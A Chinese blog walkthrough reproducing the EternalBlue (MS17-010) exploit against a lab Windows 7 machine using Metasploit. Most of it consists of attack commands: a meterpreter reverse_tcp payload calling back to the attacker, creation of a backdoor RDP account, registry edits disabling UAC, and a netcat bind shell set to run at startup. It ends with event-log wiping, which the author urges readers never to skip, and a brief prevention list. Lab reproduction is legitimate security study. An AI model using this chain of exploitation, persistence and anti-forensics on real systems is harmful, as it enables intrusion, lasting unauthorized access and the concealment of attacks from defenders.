永恒之蓝(MS17-010)漏洞复现

这篇具有很好参考价值的文章主要介绍了永恒之蓝(MS17-010)漏洞复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

漏洞简介

漏洞描述

影响版本

复现环境

攻击机

IP:192.168.109.132

靶机

IP:192.168.109.130

开启远程设置

卸载全部安全补丁

复现过程

一、主机发现

二、打开metasploit工具

三、使用msf搜寻MS17-010漏洞

四、使用MS17-010扫描模块,对靶机进行扫描

1.使用扫描模块

2.查看模块需要配置的参数

3.探测目标主机是否存在该漏洞

五、使用ms17-010攻击模块,对靶机进行攻击

1.查看攻击载荷

2.设置攻击载荷

3.查看配置参数

4.设置目标IP

5.设置用于接收从目标机弹回来的shell

6.执行攻击

六、进入、退出终端

七、创建用户

八、关闭主机防护策略并开启后门

1.创建防火墙规则

2.关闭UAC

3.开启默认共享

九、使用psexec

1.使用扫描模块

2.查看参数,并配置需要的参数

3.设置目标IP、用户名、密码以及工作组

4.执行攻击

十、上传后门

1.上传瑞士军刀(nc.exe)

2.设置键值

十一、连接后门

1.重启目标主机

2.使用瑞士军刀 NETCAT-NC进行连接

十二、抹除事件日志

预防方法


漏洞简介

2017 年 4 月 14 日晚,黑客团体 Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用 Windows 系统的 SMB 漏洞可以获取系统最高权限。

5 月 12 日,不法分子通过改造“永恒之蓝”制作了 wannacry 勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网呾政府机构与网中招,被勒索支付高额赎金才能解密恢复文件。

SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;

SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

漏洞描述

Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

漏洞名称:“永恒之蓝”漏洞

漏洞编号:MS17-010,CVE-2017 0143/0144/0145/0146/0147/0148

漏洞类型:缓冲区溢出漏洞

漏洞影响:信息泄露

缓冲区溢出是指程序试图向缓冲区写入超出预分配固定长度数据的情况。

这一漏洞可以被恶意用户利用来改变程序的流控制,甚至执行代码的任意片段。

这一漏洞的出现是由于数据缓冲器和返回地址的暂时关闭,溢出会引起返回地址被重写。

影响版本

目前已知受影响的Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0

复现环境

攻击机

kali2022.2

IP:192.168.109.132

攻击机与靶机可以相互ping通

靶机

简体中文Windows 7 Ultimate 旗舰版 SP1

IP:192.168.109.130

靶机与攻击机可以相互ping通

防火墙已关闭,445端口已开放

开启远程设置

控制面板\系统和安全\系统

永恒之蓝漏洞,漏洞复现,系统安全,网络安全

卸载全部安全补丁

控制面板→程序→卸载程序→已安装更新

把能卸载的全部卸载。

复现过程

一、主机发现

使用Nmap进行IP端口扫描

永恒之蓝漏洞,漏洞复现,系统安全,网络安全

扫描到开放了445端口,而永恒之蓝利用的就是445端口的SMB服务,操作系统溢出漏洞

二、打开metasploit工具

msfconsole

永恒之蓝漏洞,漏洞复现,系统安全,网络安全

三、使用msf搜寻MS17-010漏洞

msf6 > search ms17-010

auxiliary/scanner/smb/smb_ms17_010
是永恒之蓝扫描模块,探测主机是否存在MS17_010漏洞

exploit/windows/smb/ms17_010_eternalblue
是永恒之蓝攻击模块,一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。

永恒之蓝漏洞,漏洞复现,系统安全,网络安全

四、使用MS17-010扫描模块,对靶机进行扫描

1.使用扫描模块

永恒之蓝漏洞,漏洞复现,系统安全,网络安全

msf6 > use auxiliary/scanner/smb/smb_ms17_010 
该模块不会直接在攻击机和靶机之间建立访问,它们只负责执行扫描,嗅探,指纹识别等相关功能以辅助渗透测试。

2.查看模块需要配置的参数

msf6 > show options
右边Required项为yes的选项,说明左边 Current Setting 这个项对应的需要填写
比如:RHOSTS设置攻击目标

永恒之蓝漏洞,漏洞复现,系统安全,网络安全

3.探测目标主机是否存在该漏洞

msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.109.130   设置目标主机

msf6 auxiliary(scanner/smb/smb_ms17_010) > exploit                      开始扫描

RHOSTS 参数是要探测主机的ip或ip范围(192.168.109.120-192.168.109.140 或者 192.168.1.0/24)

图中带[+]符号表示该主机192.168.109.130存在此漏洞(正是我们的靶机win7)

永恒之蓝漏洞,漏洞复现,系统安全,网络安全

五、使用ms17-010攻击模块,对靶机进行攻击

msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue

msf6 exploit(windows/smb/ms17_010_eternalblue) > info    
查看当前漏洞信息

msf6 exploit(windows/smb/ms17_010_eternalblue) > show targets    
显示该攻击模块针对哪些特定操作系统版本、语言版本的系统

有些其他的漏洞模块对操作系统的语言和版本要求的很严,比如MS08_067,这样就要我们指定目标系统的版本的
如果不设置的话,MSF会自动帮我们判断目标操作系统的版本和语言(利用目标系统的指纹特征)


永恒之蓝漏洞,漏洞复现,系统安全,网络安全

1.查看攻击载荷

msf6 exploit(windows/smb/ms17_010_eternalblue) > show payloads

永恒之蓝漏洞,漏洞复现,系统安全,网络安全

2.设置攻击载荷

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

永恒之蓝漏洞,漏洞复现,系统安全,网络安全

3.查看配置参数

msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

永恒之蓝漏洞,漏洞复现,系统安全,网络安全

4.设置目标IP

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.109.130  
如果有多个攻击目标,ip间直接用空格隔开就行

永恒之蓝漏洞,漏洞复现,系统安全,网络安全

5.设置用于接收从目标机弹回来的shell

msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.109.132

永恒之蓝漏洞,漏洞复现,系统安全,网络安全

6.执行攻击

msf6 exploit(windows/smb/ms17_010_eternalblue) > run
出现meterpreter >   即为成功

永恒之蓝漏洞,漏洞复现,系统安全,网络安全

六、进入、退出终端

meterpreter > shell        进入终端
 
C:\Windows\system32>exit   退出终端

chcp 65001           解决乱码

永恒之蓝漏洞,漏洞复现,系统安全,网络安全

永恒之蓝漏洞,漏洞复现,系统安全,网络安全

七、创建用户

run post/windows/manage/enable_rdp USERNAME=tubage PASSWORD=123.com

创建完成之后我们可以去远程连接桌面默认30秒目标无操作自动连接
root@kali# rdesktop 192.168.109.130     远程连接桌面

永恒之蓝漏洞,漏洞复现,系统安全,网络安全

八、关闭主机防护策略并开启后门

1.创建防火墙规则

shell             #进入终端
chcp 65001        #Cmd窗口中utf-8格式的编码
netsh firewall add portopening TCP 4444 "tubage" ENABLE ALL
防止防火墙以后是开启的,所以提前创建一条防火墙规则允许4444端口访问网络,方便后期操作

永恒之蓝漏洞,漏洞复现,系统安全,网络安全

2.关闭UAC

用户帐户控制(User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制。

其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权,以达到帮助阻止恶意程序(有时也称为“恶意软件”)损坏系统的效果。

cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

永恒之蓝漏洞,漏洞复现,系统安全,网络安全

3.开启默认共享

cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
开启系统主机的默认共享,也叫隐藏共享,是用来远程管理的,一般的时候看不到的,但是非常方便黑客利用这个功能,远程执行命令。

输入多次exit 直到回到meterpreter ,输入backgroup 将刚刚永恒之蓝拿到的会话保持到后台。

九、使用psexec

psexec 是 windows 下非常好的一款远程命令行工具。

原理:

通过管道在远程目标机器上创建一个psexec服务,并在本地磁盘中生成一个名为"PSEXESVC"的二进制文件。然后,通过psexec服务运行命令,运行结束后删除服务。

在使用psexec执行远程命令时,会在目标系统中创建一个psexec服务。

命令执行后,psexec服务将会被自动删除。

由于创建或删除服务时会产生大量的日志,所以会在攻击溯源时通过日志反推攻击流程。

1.使用扫描模块

use exploit/windows/smb/psexec

永恒之蓝漏洞,漏洞复现,系统安全,网络安全

2.查看参数,并配置需要的参数

show options

永恒之蓝漏洞,漏洞复现,系统安全,网络安全

3.设置目标IP、用户名、密码以及工作组

set RHOSTS 192.168.109.130     #设置目标IP
set smbuser tubage             #设置目标用户名
set smbpass 123.com            #设置目标密码
set smbdomain WORKGROUP        #设置目标工作组(在计算机属性里面能看到所属工作组)

永恒之蓝漏洞,漏洞复现,系统安全,网络安全

4.执行攻击

msf6 exploit(windows/smb/psexec) > run
meterpreter > getuid       #查看获取的当前权限

永恒之蓝漏洞,漏洞复现,系统安全,网络安全

十、上传后门

为了让连接持久话,我们可以上传后门程序,这样就能保持会话长久建立。

在kali 中如下路径有我们的后门程序nc.exe 俗称瑞士军刀。

1.上传瑞士军刀(nc.exe)

upload /usr/share/windows-binaries/nc.exe C:\\windows     
#上传到目标主机C盘Windows目录下,如果要更隐秘一点的话,可以往更深处存放。

永恒之蓝漏洞,漏洞复现,系统安全,网络安全

2.设置键值

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\nc.exe -Ldp 443 -e cmd.exe'
#当目标主机开机时,程序后台运行,且监听端口为443,这个端口可自行设置。

永恒之蓝漏洞,漏洞复现,系统安全,网络安全

十一、连接后门

1.重启目标主机

meterpreter > reboot
等等一段时间,等目标主机重启并登录之后,便会出现蓝色型号。

永恒之蓝漏洞,漏洞复现,系统安全,网络安全

2.使用瑞士军刀 NETCAT-NC进行连接

nc -v 192.168.109.130 443

永恒之蓝漏洞,漏洞复现,系统安全,网络安全

十二、抹除事件日志

meterpreter > clearev
因为我们的所有操作都会被记录在目标系统的日志文件之中所以在完成攻击操作之后,千万别忘了抹除事件日志。

永恒之蓝漏洞,漏洞复现,系统安全,网络安全文章来源地址https://www.toymoban.com/news/detail-546079.html

预防方法

  1. 为计算机安装最新的安全补丁:MS17-010补丁
  2. 及时备份,一定要离线备份重要文件
  3. 开启防火墙
  4. 关闭445、135、137、138、139端口,关闭网络共享。

到了这里,关于永恒之蓝(MS17-010)漏洞复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【ms17-010】永恒之蓝漏洞复现

    准备工作 攻击机:kali,ip:192.168.56.128 靶机:windows server 2003,ip:192.168.56.132 工具:nmap(扫描)、msf 漏洞利用 首先我们先在攻击机上使用nmap扫一下该网段主机的存活情况 此时已经扫描出来了,ip为: 192.168.56.132 的主机开启,并且显示了开放的端口号。 然后我们可以使用:

    2024年01月19日
    浏览(40)
  • 永恒之蓝ms17_010漏洞复现

    攻击机:Linux kali(IP:192.168.52.132) 靶机:Windows 7(x64)(IP:192.168.52.130) 条件:靶机防火墙关闭,两台机子能够相互ping通,靶机445端口开启(永恒之蓝漏洞就是通过恶意代码扫描并攻击开放445端口的 Windows 主机)   登录 kali linux,用 nmap 探测本网段存活主机 nmap 192.168.5

    2024年02月11日
    浏览(39)
  • 《MS17-010(永恒之蓝)—漏洞复现及防范》

    作者: susususuao 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 - 永恒之蓝 永恒之蓝(Eternal Blue)是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。而SMB服务是一个协议名,它能被用于Web连接和客户端与服

    2024年02月06日
    浏览(86)
  • ms17-010(永恒之蓝) 漏洞复现与处理

    ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入

    2024年02月09日
    浏览(43)
  • MS17-010(永恒之蓝)漏洞分析与复现

    一、漏洞简介 1、永恒之蓝介绍: 永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广

    2024年02月02日
    浏览(39)
  • 永恒之蓝漏洞复现(ms17-010)----保姆级教程

    攻击机: kali Linux             靶机: win7 x64    提示:  复现攻击前请关闭杀毒软件   1.复现第一步按以下操作打开 445端口: 在 \\\"运行\\\" 里输入: regedit 打开注册表编辑器                                                                    

    2023年04月08日
    浏览(46)
  • 利用kali Linux复现永恒之蓝(MS17-010)漏洞

    目录 什么是永恒之蓝? 永恒之蓝漏洞原理 实验环境 操作前提 实验步骤 (1)复现成功后,执行截图命令 (2)对受害机器建立用户,并且开启受害机器的远程桌面并连接 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒

    2024年02月12日
    浏览(36)
  • MS17-010永恒之蓝漏洞复现(手把手教程,超细!)

    0x00-声明:小白一枚,写下来为了记录和学习交流,大神不喜勿喷。 0x01-思路:网段扫描—获取IP—漏洞扫描—发现存在漏洞—攻击拿shell—提权 目录 一、环境搭建                 01 所需软件:  二、开始操作  01 kali 开始网段扫描 02 漏洞利用 03 提权 04 利用管理员用

    2023年04月09日
    浏览(77)
  • 网络安全入门第一课—永恒之蓝(ms17-010)

    目录 一、永恒之蓝(Eternal Blue) 二、实验环境 1.软件:VMware Workstations14 以上版本 2.虚拟机:Kali-Linux、Windows 7  三、永恒之蓝实验 1.打开终端使用命令行查看ip地址,并测试是否能互通 2. 主机发现 3.启动msf 4.查看漏洞模块 5.扫描过程 6.攻击过程 7.显示远程主机系统信息: s

    2024年02月08日
    浏览(52)
  • Windows系统漏洞检测与漏洞利用以及修复(永恒之蓝ms17-010)

    ●环境: 攻击机:Linux kali(IP:192.168.107.129) 靶机:Windows 7 Enterprise (x64)(IP:192.168.107.143) 实验条件:两台机子可以相互ping通,并且靶机(无补丁)开启了445端口,防火墙是关闭的! ●永恒之蓝介绍: 永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病

    2024年02月11日
    浏览(40)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包